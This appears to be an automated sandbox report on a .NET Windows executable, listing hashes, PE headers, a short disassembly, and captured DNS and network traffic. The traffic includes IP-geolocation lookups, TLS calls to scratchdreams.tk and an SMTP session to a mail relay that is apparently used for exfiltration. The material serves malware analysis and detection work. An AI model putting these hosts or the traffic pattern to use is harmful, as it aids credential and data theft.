                                                                          SHA512:0261b627ed3e545a73868d559497fe44060fe9f62e98f6abd1b315c76461fd923e15eff017071d4c3670acd46e79aa4d6c5b0779a3005a1dc414007bd3b2264f
                                                                          SSDEEP:12288:oBUHz1PozcOXiblkQN6gK+papl9P3oZihQbQXMKPDq:oGHzqBaiG6oaP9P3SihQb0b
                                                                          TLSH:D1C4024036BE8F93E5F94BF68470A01487F4792F28B6E30E5DC210E949B1F505A92F97
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..J.........."i... ........@.. ....................................@................................
                                                                          Icon Hash:00928e8e8686b000
                                                                          Entrypoint:0x486922
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0xD78ABBA7 [Fri Aug 4 02:10:47 2084 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          xor al, 38h
                                                                          xor eax, 38483446h
                                                                          xor al, 47h
                                                                          dec eax
                                                                          xor eax, 00003447h
                                                                          add byte ptr [edx], dh
                                                                          inc ebx
                                                                          inc edx
                                                                          push ebx
                                                                          aaa
                                                                          dec eax
                                                                          xor eax, 00003439h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x868ce0x4f.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x5ac.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x846140x70.text
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x849480x84a00a367f1b8423a614c1c033bcb52199d89False0.9277362158341188data7.904697572590049IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x880000x5ac0x600fb7714d8e6f5fc52597c169ca504abe4False0.4212239583333333data4.0762929028766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x8a0000xc0x2001dbc5c6df18a8ab418170c75eb37567dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_VERSION0x880900x31cdata0.4321608040201005
                                                                          RT_MANIFEST0x883bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 4, 2024 10:27:55.207700968 CEST4970980192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:55.442375898 CEST8049709132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:55.442462921 CEST4970980192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:55.442771912 CEST4970980192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:55.678927898 CEST8049709132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:55.679744959 CEST8049709132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:55.684537888 CEST4970980192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:55.920300961 CEST8049709132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:55.968890905 CEST4970980192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:56.085236073 CEST49710443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.085268021 CEST44349710104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:56.085433006 CEST49710443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.091358900 CEST49710443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.091373920 CEST44349710104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:56.353866100 CEST44349710104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:56.354161024 CEST49710443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.359365940 CEST49710443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.359379053 CEST44349710104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:56.359672070 CEST44349710104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:56.403366089 CEST49710443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.444250107 CEST44349710104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:56.644984961 CEST44349710104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:56.645114899 CEST44349710104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:56.649862051 CEST49710443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.655358076 CEST49710443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.657218933 CEST4970980192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:56.892607927 CEST8049709132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:56.895149946 CEST49711443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.895186901 CEST44349711104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:56.895250082 CEST49711443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.895550013 CEST49711443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:56.895562887 CEST44349711104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:56.937549114 CEST4970980192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:57.155155897 CEST44349711104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:57.165738106 CEST49711443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:57.165776968 CEST44349711104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:57.458391905 CEST44349711104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:57.458487988 CEST44349711104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:57.458559990 CEST49711443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:57.459167957 CEST49711443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:57.463090897 CEST4970980192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:57.464296103 CEST4971280192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:57.696438074 CEST8049712132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:57.696651936 CEST4971280192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:57.696743965 CEST4971280192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:57.697844028 CEST8049709132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:57.697906017 CEST4970980192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:57.928708076 CEST8049712132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:57.929542065 CEST8049712132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:57.931044102 CEST49713443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:57.931075096 CEST44349713104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:57.931171894 CEST49713443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:57.931422949 CEST49713443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:57.931435108 CEST44349713104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:57.984443903 CEST4971280192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:58.188324928 CEST44349713104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:58.190254927 CEST49713443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:58.190273046 CEST44349713104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:58.485289097 CEST44349713104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:58.485409021 CEST44349713104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:58.485464096 CEST49713443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:58.486016035 CEST49713443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:58.491061926 CEST4971480192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:58.721322060 CEST8049714132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:58.721643925 CEST4971480192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:58.721911907 CEST4971480192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:58.952255011 CEST8049714132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:58.952750921 CEST8049714132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:58.954505920 CEST49715443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:58.954535007 CEST44349715104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:58.954720020 CEST49715443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:58.954927921 CEST49715443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:58.954941988 CEST44349715104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:59.000098944 CEST4971480192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:59.211585999 CEST44349715104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:59.213311911 CEST49715443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:59.213336945 CEST44349715104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:59.508538961 CEST44349715104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:59.508641958 CEST44349715104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:59.508830070 CEST49715443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:59.509484053 CEST49715443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:59.512984991 CEST4971480192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:59.514183998 CEST4971680192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:59.742074966 CEST8049716132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:59.742151022 CEST4971680192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:59.742269039 CEST4971680192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:59.744247913 CEST8049714132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:59.744316101 CEST4971480192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:27:59.971712112 CEST8049716132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:59.972361088 CEST8049716132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:27:59.973692894 CEST49717443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:59.973743916 CEST44349717104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:27:59.973812103 CEST49717443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:59.974039078 CEST49717443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:27:59.974056005 CEST44349717104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:00.015661955 CEST4971680192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:00.231553078 CEST44349717104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:00.232954979 CEST49717443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:00.232988119 CEST44349717104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:00.529886007 CEST44349717104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:00.530013084 CEST44349717104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:00.530162096 CEST49717443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:00.530453920 CEST49717443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:00.533391953 CEST4971680192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:00.534461021 CEST4971880192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:00.761117935 CEST8049716132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:00.761197090 CEST4971680192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:00.764693975 CEST8049718132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:00.764769077 CEST4971880192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:00.764883995 CEST4971880192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:00.995322943 CEST8049718132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:01.057905912 CEST8049718132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:01.059323072 CEST49719443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:01.059364080 CEST44349719104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:01.059448004 CEST49719443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:01.059669018 CEST49719443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:01.059683084 CEST44349719104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:01.109503984 CEST4971880192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:01.317008972 CEST44349719104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:01.330501080 CEST49719443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:01.330521107 CEST44349719104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:01.613706112 CEST44349719104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:01.613814116 CEST44349719104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:01.613861084 CEST49719443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:01.614764929 CEST49719443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:01.617921114 CEST4971880192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:01.619021893 CEST4972080192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:01.848156929 CEST8049718132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:01.848246098 CEST4971880192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:01.851039886 CEST8049720132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:01.851205111 CEST4972080192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:01.851242065 CEST4972080192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:02.083311081 CEST8049720132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:02.083789110 CEST8049720132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:02.084897995 CEST49721443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:02.084938049 CEST44349721104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:02.085009098 CEST49721443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:02.085243940 CEST49721443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:02.085257053 CEST44349721104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:02.125207901 CEST4972080192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:02.342479944 CEST44349721104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:02.343921900 CEST49721443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:02.343945026 CEST44349721104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:02.640252113 CEST44349721104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:02.640443087 CEST44349721104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:02.640492916 CEST49721443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:02.641068935 CEST49721443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:02.646155119 CEST4972080192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:02.647387028 CEST4972280192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:02.877975941 CEST8049722132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:02.878139019 CEST8049720132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:02.878165007 CEST4972280192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:02.878200054 CEST4972080192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:02.878231049 CEST4972280192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:03.108962059 CEST8049722132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:03.110166073 CEST8049722132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:03.111614943 CEST49723443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:03.111646891 CEST44349723104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:03.111721039 CEST49723443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:03.112042904 CEST49723443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:03.112054110 CEST44349723104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:03.156294107 CEST4972280192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:03.367238045 CEST44349723104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:03.413089037 CEST49723443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:03.413105965 CEST44349723104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:03.664804935 CEST44349723104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:03.665026903 CEST44349723104.21.67.152192.168.2.5
                                                                          Apr 4, 2024 10:28:03.665081024 CEST49723443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:03.666130066 CEST49723443192.168.2.5104.21.67.152
                                                                          Apr 4, 2024 10:28:03.684051037 CEST4972280192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:03.914802074 CEST8049722132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:28:03.915043116 CEST4972280192.168.2.5132.226.247.73
                                                                          Apr 4, 2024 10:28:04.065965891 CEST49724443192.168.2.5172.67.169.18
                                                                          Apr 4, 2024 10:28:04.065985918 CEST44349724172.67.169.18192.168.2.5
                                                                          Apr 4, 2024 10:28:04.066060066 CEST49724443192.168.2.5172.67.169.18
                                                                          Apr 4, 2024 10:28:04.066704988 CEST49724443192.168.2.5172.67.169.18
                                                                          Apr 4, 2024 10:28:04.066715956 CEST44349724172.67.169.18192.168.2.5
                                                                          Apr 4, 2024 10:28:04.328640938 CEST44349724172.67.169.18192.168.2.5
                                                                          Apr 4, 2024 10:28:04.328876019 CEST49724443192.168.2.5172.67.169.18
                                                                          Apr 4, 2024 10:28:04.330630064 CEST49724443192.168.2.5172.67.169.18
                                                                          Apr 4, 2024 10:28:04.330636024 CEST44349724172.67.169.18192.168.2.5
                                                                          Apr 4, 2024 10:28:04.330851078 CEST44349724172.67.169.18192.168.2.5
                                                                          Apr 4, 2024 10:28:04.332184076 CEST49724443192.168.2.5172.67.169.18
                                                                          Apr 4, 2024 10:28:04.376228094 CEST44349724172.67.169.18192.168.2.5
                                                                          Apr 4, 2024 10:28:35.825572014 CEST44349724172.67.169.18192.168.2.5
                                                                          Apr 4, 2024 10:28:35.825628996 CEST44349724172.67.169.18192.168.2.5
                                                                          Apr 4, 2024 10:28:35.825683117 CEST49724443192.168.2.5172.67.169.18
                                                                          Apr 4, 2024 10:28:35.830303907 CEST49724443192.168.2.5172.67.169.18
                                                                          Apr 4, 2024 10:28:41.199204922 CEST49733587192.168.2.5208.91.198.143
                                                                          Apr 4, 2024 10:28:41.394470930 CEST58749733208.91.198.143192.168.2.5
                                                                          Apr 4, 2024 10:28:41.394630909 CEST49733587192.168.2.5208.91.198.143
                                                                          Apr 4, 2024 10:28:41.735502958 CEST58749733208.91.198.143192.168.2.5
                                                                          Apr 4, 2024 10:28:41.735698938 CEST49733587192.168.2.5208.91.198.143
                                                                          Apr 4, 2024 10:28:41.932097912 CEST58749733208.91.198.143192.168.2.5
                                                                          Apr 4, 2024 10:28:41.932111979 CEST58749733208.91.198.143192.168.2.5
                                                                          Apr 4, 2024 10:28:41.933192015 CEST49733587192.168.2.5208.91.198.143
                                                                          Apr 4, 2024 10:28:42.131150007 CEST58749733208.91.198.143192.168.2.5
                                                                          Apr 4, 2024 10:28:42.131409883 CEST49733587192.168.2.5208.91.198.143
                                                                          Apr 4, 2024 10:28:42.333214045 CEST58749733208.91.198.143192.168.2.5
                                                                          Apr 4, 2024 10:28:42.333444118 CEST49733587192.168.2.5208.91.198.143
                                                                          Apr 4, 2024 10:28:42.530410051 CEST58749733208.91.198.143192.168.2.5
                                                                          Apr 4, 2024 10:28:42.530620098 CEST49733587192.168.2.5208.91.198.143
                                                                          Apr 4, 2024 10:28:42.746668100 CEST58749733208.91.198.143192.168.2.5
                                                                          Apr 4, 2024 10:28:42.749476910 CEST49733587192.168.2.5208.91.198.143
                                                                          Apr 4, 2024 10:28:42.945805073 CEST58749733208.91.198.143192.168.2.5
                                                                          Apr 4, 2024 10:28:42.945875883 CEST49733587192.168.2.5208.91.198.143
                                                                          Apr 4, 2024 10:29:02.929195881 CEST8049712132.226.247.73192.168.2.5
                                                                          Apr 4, 2024 10:29:02.929368973 CEST4971280192.168.2.5132.226.247.73
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 4, 2024 10:27:55.070929050 CEST6138253192.168.2.51.1.1.1
                                                                          Apr 4, 2024 10:27:55.195292950 CEST53613821.1.1.1192.168.2.5
                                                                          Apr 4, 2024 10:27:55.959363937 CEST6136253192.168.2.51.1.1.1
                                                                          Apr 4, 2024 10:27:56.084506989 CEST53613621.1.1.1192.168.2.5
                                                                          Apr 4, 2024 10:28:03.683947086 CEST5038753192.168.2.51.1.1.1
                                                                          Apr 4, 2024 10:28:04.065042973 CEST53503871.1.1.1192.168.2.5
                                                                          Apr 4, 2024 10:28:41.071504116 CEST5553253192.168.2.51.1.1.1
                                                                          Apr 4, 2024 10:28:41.198482990 CEST53555321.1.1.1192.168.2.5
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Apr 4, 2024 10:27:55.070929050 CEST192.168.2.51.1.1.10xb125Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:27:55.959363937 CEST192.168.2.51.1.1.10x8abcStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:28:03.683947086 CEST192.168.2.51.1.1.10x5d4Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:28:41.071504116 CEST192.168.2.51.1.1.10xb066Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Apr 4, 2024 10:27:55.195292950 CEST1.1.1.1192.168.2.50xb125No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                          Apr 4, 2024 10:27:55.195292950 CEST1.1.1.1192.168.2.50xb125No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:27:55.195292950 CEST1.1.1.1192.168.2.50xb125No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:27:55.195292950 CEST1.1.1.1192.168.2.50xb125No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:27:55.195292950 CEST1.1.1.1192.168.2.50xb125No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:27:55.195292950 CEST1.1.1.1192.168.2.50xb125No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:27:56.084506989 CEST1.1.1.1192.168.2.50x8abcNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:27:56.084506989 CEST1.1.1.1192.168.2.50x8abcNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:28:04.065042973 CEST1.1.1.1192.168.2.50x5d4No error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:28:04.065042973 CEST1.1.1.1192.168.2.50x5d4No error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:28:41.198482990 CEST1.1.1.1192.168.2.50xb066No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                          Apr 4, 2024 10:28:41.198482990 CEST1.1.1.1192.168.2.50xb066No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
